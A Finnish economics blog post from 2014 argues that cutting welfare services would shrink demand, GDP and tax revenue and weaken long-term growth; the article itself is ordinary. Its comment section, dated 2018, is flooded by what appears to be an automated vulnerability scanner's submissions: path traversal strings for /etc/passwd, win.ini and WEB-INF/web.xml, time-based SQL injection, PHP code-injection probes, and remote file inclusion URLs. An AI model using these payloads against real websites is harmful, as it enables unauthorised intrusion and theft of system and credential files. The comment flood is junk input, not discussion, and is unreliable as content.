fi | sv | eng

Hyvinvointipalveluilla on monipolvisia talousvaikutuksia

14.10.2014, 08:30

Jussi Ahokas, pääekonomisti

Viimeaikoina julkisessa keskustelussa on esitetty näkemyksiä, joiden mukaan Suomen julkisen talouden ongelmat voitaisiin ratkaista yksinkertaisesti palaamalla hyvinvointipalveluiden laajuudessa vuosikymmen taaksepäin. Tällaista toimenpidettä ovat esittäneet esimerkiksi Kokoomuksen kansanedustaja Esko Kurvinen  sekä EK:n johtaja Kai Mykkänen.

Ehdotusta perustellaan sillä, että esimerkiksi vuonna 2004 Suomen palvelutaso oli jo erittäin korkea eivätkä sen jälkeiset lisäykset palvelutarjontaan ole enää merkittävästi parantaneet yhteiskunnan edellytyksiä luoda hyvinvointia.

Koska palvelutarve ikärakenteen muutoksen vuoksi tulevaisuudessa kasvaa ja talouskasvun oletetaan jatkuvan hitaana pitkään, ei julkisen hyvinvointivastuun laajentamisen tai edes ylläpitämisen nähdä olevan mahdollista.

Kurvisen ja Mykkäsen niin sanottujen rönsyilevien palvelujen – joita ovat Mykkäsen mukaan muun muassa työttömien terveystarkastukset, sosiaalihuollon henkilöstön tehostettu koulutus ja kunnallisen hammashuollon laajentaminen – karsimisesitys saattaa tuntua ensisilmäyksellä suoraviivaiselta ja helpolta tavalta helpottaa julkisen talouden paineita. Kun esitystä tarkastellaan yksityiskohtaisemmin, havaitaan siihen liittyvän kuitenkin ongelmia. Tärkein ongelma on se, että palvelutason alentaminen vaikuttaisi negatiivisesti talouteen sekä lyhyellä että pitkällä tähtäyksellä.

Lyhyellä tähtäyksellä vaikutukset näkyisivät talouden kokonaiskysynnän heikentymisenä. Aivan kuten kaiken muunkin julkisen palvelutoiminnan, hyvinvointipalveluiden rönsyjen leikkaaminen vähentäisi julkista kulutusta taloudessa. Koska julkinen kulutus on BKT:n komponentti, supistaisi palvelumenojen leikkaaminen suoraan talouden kokonaistuotantoa. Näin ollen leikkaukset pienentäisivät vain vähän julkisten kulutusmenojen osuutta BKT:sta, jonka kasvusta esimerkiksi Mykkänen on kirjoituksessaan huolissaan.

Leikkaukset vaikuttaisivat BKT:hen myös välillisesti. Palvelumenojen leikkaus tarkoittaisi julkisten työpaikkojen ja julkisen sektorin maksamien palkansaajakorvausten vähennystä. Tämä puolestaan johtaisi kotitalouksien tulojen ja sitä kautta yksityisen kulutuksen supistumiseen. Näin yksityisten yritysten tuottamille hyödykkeille olisi vähemmän kysyntää. Leikkaukset vähentäisivät siis kotimaista kulutusta bruttomääräänsä enemmän, kun julkisen kulutuksen positiivinen kerroinvaikutus jäisi syntymättä.

Kun talous kärsii liian vähäisestä kokonaiskysynnästä, kulutuksen leikkaaminen on erityisen haitallista. Taantumassa, jossa Suomen talous on ollut kohta kolme vuotta, leikkaukset voisivat kutistaa BKT:ta merkittävästi. Tämä on seurausta siitä, että kotitalouksien havaitessa tulojen pienenevän, ne lisäävät myös säästämistään ja vähentävät velanottoa. Kun yritysten kohtaama kysyntä supistuu, ne puolestaan luopuvat investoinneista. Näin talouden kokonaistulotaso supistuu entisestään. Koska verotulot riippuvat kansantulon kehityksestä (kuvio 1), on todennäköistä, että leikkaukset eivät sanottavasti parantaisi julkisen talouden tasapainoa, mihin niillä viimekädessä pyritään.

Kuvio 1. BKT:n kasvu ja verotulojen kasvu Suomen taloudessa vuosina 2003-2013 (2003=100).

(Klikkaa kuvasta suuremmaksi)

Hyvinvointipalvelujen karsiminen heikentäisi myös pitkän tähtäimen kasvupotentiaalia. Lähes kaikilla Mykkäsen karsittavaksi ehdottamilla palveluilla lisätään työikäisen väestön hyvinvointia, työkykyä ja osallisuutta. Näistä palveluista luopuminen vaikuttaisi haitallisesti työvoiman tarjontaan ja talouskasvuun, varsinkin korkean työttömyyden oloissa. Mainitut palveluthan ovat juuri niitä, joiden avulla esimerkiksi pitkäaikaistyöttömien työkykyä pidetään yllä.

Koska julkisen talouden alijäämien kasvu ja laskennallisen kestävyysvajeen suureneminen viime vuosina on johtunut erityisesti talouskasvun hidastumisesta ja verotulojen vähenemisestä, talouteen haitallisesti vaikuttavilla leikkauksilla ei pureuduta varsinaiseen ongelmaan. Tällä hetkellä Suomen ja Euroopan taloudessa tarvitaan nimenomaan sellaisia politiikkatoimia, jotka kannustavat yksityisen talouden jälleen kasvuun ja pitävät huolta pitkän tähtäyksen kasvupotentiaalista.

Näiden toimien joukossa tärkeimpiä ovat julkiset investoinnit hyvinvointipalveluihin, jotka lisäävät talouden tulovirtoja parantaen samalla kansalaisten hyvinvointia ja toimintakykyä. Palveluita tuotettaessa ja palvelurakenteita kehitettäessä on tietysti panostettava siihen, että palvelut tuotetaan tehokkaasti ihmisten tarpeista lähtien ja eheitä palveluketjuja muodostaen.

Talouden ja hyvinvoinnin suhteen syvällisempi tarkastelu osoittaa, että ainoastaan terve, työkykyinen ja osaava työvoima voi luoda kasvua pitkällä tähtäyksellä. Hyvinvointitaloudessa kuitenkin myös hyvinvointipalveluiden positiiviset lyhyen aikavälin talousvaikutukset on ymmärrettävä. Tällä tavalla palvelurakenteita kehitettäessä ei sorruta liian suoraviivaisiin toimenpiteisiin, jotka käytännössä ovat haitallisia talouskasvulle.

Lue lisää

Kommentointi

Otsikko:
Nimi:
Kommentti:
 

e

Nimi: e

1

29.07.2018, 09:08

e

Nimi: e

set|set&set

29.07.2018, 09:12

e

Nimi: set|set&set

1

29.07.2018, 09:12

set|set&set

Nimi: e

1

29.07.2018, 09:12

e

Nimi: e

../../../../../../../../../../../../../../../proc/version

29.07.2018, 09:12

e

Nimi: e

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

29.07.2018, 09:12

e

Nimi: e

../../../../../../../../../../etc/passwd

29.07.2018, 09:12

e

Nimi: e

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

29.07.2018, 09:12

e

Nimi: e

%2fetc%2fpasswd

29.07.2018, 09:12

e

Nimi: e

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

29.07.2018, 09:12

e

Nimi: e

/.././.././.././.././.././.././.././../etc/./passwd%00

29.07.2018, 09:12

e

Nimi: e

/etc/passwd

29.07.2018, 09:12

e

Nimi: e

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

29.07.2018, 09:12

e

Nimi: e

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

29.07.2018, 09:12

e

Nimi: e

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

29.07.2018, 09:12

e

Nimi: e

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

29.07.2018, 09:12

e

Nimi: e

file:///etc/passwd

29.07.2018, 09:12

e

Nimi: e

-1; waitfor delay '0:0:6' --

29.07.2018, 09:12

e

Nimi: e

/WEB-INF/web.xml

29.07.2018, 09:12

e

Nimi: e

/\../\../\../\../\../\../\../etc/passwd

29.07.2018, 09:12

e

Nimi: e

WEB-INF/web.xml

29.07.2018, 09:12

e

Nimi: e

WEB-INF\web.xml

29.07.2018, 09:12

e

Nimi: e

../../../../../../../../../../boot.ini

29.07.2018, 09:12

e

Nimi: e

../../../../../../../../../../windows/win.ini

29.07.2018, 09:12

e

Nimi: e

................windowswin.ini

29.07.2018, 09:12

e

Nimi:

1

29.07.2018, 09:12

e

Nimi: e

..\..\..\..\..\..\..\..\windows\win.ini

29.07.2018, 09:12

e

Nimi: -1 OR 3*2

1

29.07.2018, 09:12

e

Nimi: e

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

29.07.2018, 09:12

e

Nimi: e

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

29.07.2018, 09:12

e

Nimi: e

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

29.07.2018, 09:12

(Ei otsikkoa)

Nimi: e

1

29.07.2018, 09:12

e

Nimi: e

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

29.07.2018, 09:12

e

Nimi: ../../../../../../../../../../etc/passwd

1

29.07.2018, 09:12

e

Nimi: ../../../../../../../../../../../../../../../proc/version

1

29.07.2018, 09:12

e

Nimi: e

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

29.07.2018, 09:12

e

Nimi: ../../../../../../../../../../etc/passwd.jpg

1

29.07.2018, 09:12

e

Nimi: -1' OR 3*2

1

29.07.2018, 09:12

e

Nimi: ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

29.07.2018, 09:12

e

Nimi: e

Http://testasp.vulnweb.com/t/fit.txt

29.07.2018, 09:12

e

Nimi: e

http://testasp.vulnweb.com/t/fit.txt?.jpg

29.07.2018, 09:12

e

Nimi: e

testasp.vulnweb.com

29.07.2018, 09:12

e

Nimi: /../..//../..//../..//../..//../..//etc/passwd.jpg

1

29.07.2018, 09:12

e

Nimi: %2fetc%2fpasswd

1

29.07.2018, 09:12

e

Nimi: 1some_inexistent_file_with_long_name.jpg

1

29.07.2018, 09:12

e

Nimi: http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

1

29.07.2018, 09:12

e

Nimi: Http://testasp.vulnweb.com/t/fit.txt

1

29.07.2018, 09:12

e

Nimi: e

)

29.07.2018, 09:12

e

Nimi: e

^(#$!@#$)(()))******

29.07.2018, 09:12

e

Nimi: /etc/passwd

1

29.07.2018, 09:12

e

Nimi: e

!(()&&!|*|*|

29.07.2018, 09:12

e

Nimi: .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

29.07.2018, 09:12

e

Nimi: testasp.vulnweb.com

1

29.07.2018, 09:12

e

Nimi: !(()&&!|*|*|

1

29.07.2018, 09:12

e

Nimi: ^(#$!@#$)(()))******

1

29.07.2018, 09:12

e

Nimi: ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

29.07.2018, 09:12

e

Nimi: )

1

29.07.2018, 09:12

e

Nimi: http://testasp.vulnweb.com/t/fit.txt?.jpg

1

29.07.2018, 09:12

e

Nimi: /.././.././.././.././.././.././.././../etc/./passwd%00

1

29.07.2018, 09:12

e

Nimi: -1" OR 3*2

1

29.07.2018, 09:12

e

Nimi: ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

29.07.2018, 09:12

e

Nimi: 1 waitfor delay '0:0:3' --

1

29.07.2018, 09:12

)

Nimi: e

1

29.07.2018, 09:12

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

Nimi: e

1

29.07.2018, 09:12

!(()&&!|*|*|

Nimi: e

1

29.07.2018, 09:12

e

Nimi: file:///etc/passwd

1

29.07.2018, 09:12

1some_inexistent_file_with_long_name.jpg

Nimi: e

1

29.07.2018, 09:12

e

Nimi: invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1

29.07.2018, 09:12

^(#$!@#$)(()))******

Nimi: e

1

29.07.2018, 09:12

e

Nimi: /\../\../\../\../\../\../\../etc/passwd

1

29.07.2018, 09:12

http://testasp.vulnweb.com/t/fit.txt?.jpg

Nimi: e

1

29.07.2018, 09:12

e

Nimi: e

29.07.2018, 09:12

e

Nimi: e

'"()

29.07.2018, 09:12

Http://testasp.vulnweb.com/t/fit.txt

Nimi: e

1

29.07.2018, 09:12

testasp.vulnweb.com

Nimi: e

1

29.07.2018, 09:12

e

Nimi: e

;print(md5(acunetix_wvs_security_test));

29.07.2018, 09:12

e

Nimi: /WEB-INF/web.xml

1

29.07.2018, 09:12

e

Nimi: WEB-INF/web.xml

1

29.07.2018, 09:12

e

Nimi: '"()

1

29.07.2018, 09:12

e

Nimi: e

";print(md5(acunetix_wvs_security_test));$a="

29.07.2018, 09:12

e

Nimi: e

';print(md5(acunetix_wvs_security_test));$a='

29.07.2018, 09:12

e

Nimi: e

${@print(md5(acunetix_wvs_security_test))}

29.07.2018, 09:12

e

Nimi: e

${@print(md5(acunetix_wvs_security_test))}\

29.07.2018, 09:12

'"()

Nimi: e

1

29.07.2018, 09:12

e

Nimi: ../../../../../../../../../../windows/win.ini

1

29.07.2018, 09:12

e

Nimi: WEB-INF\web.xml

1

29.07.2018, 09:12

e

Nimi: ../../../../../../../../../../windows/win.ini.jpg

1

29.07.2018, 09:12

e

Nimi: ;print(md5(acunetix_wvs_security_test));

1

29.07.2018, 09:12

e

Nimi: ';print(md5(acunetix_wvs_security_test));$a='

1

29.07.2018, 09:12

e

Nimi: e

http://testasp.vulnweb.com/t/xss.html?%00.jpg

29.07.2018, 09:12

e

Nimi: http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

29.07.2018, 09:12

e

Nimi: ../../../../../../../../../../boot.ini

1

29.07.2018, 09:12

e

Nimi: ";print(md5(acunetix_wvs_security_test));$a="

1

29.07.2018, 09:12

e

Nimi: ${@print(md5(acunetix_wvs_security_test))}\

1

29.07.2018, 09:12

e

Nimi: ................windowswin.ini

1

29.07.2018, 09:12

e

Nimi: ${@print(md5(acunetix_wvs_security_test))}

1

29.07.2018, 09:12

http://testasp.vulnweb.com/t/xss.html?%00.jpg

Nimi: e

1

29.07.2018, 09:12

e

Nimi: e

1'"

29.07.2018, 09:12

e

Nimi: ..\..\..\..\..\..\..\..\windows\win.ini

1

29.07.2018, 09:12

e

Nimi: /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

29.07.2018, 09:12

e

Nimi: e

\

29.07.2018, 09:12

e

Nimi: ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

29.07.2018, 09:12

e

Nimi: ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

29.07.2018, 09:12

e

Nimi: )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

29.07.2018, 09:12

e

Nimi: unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\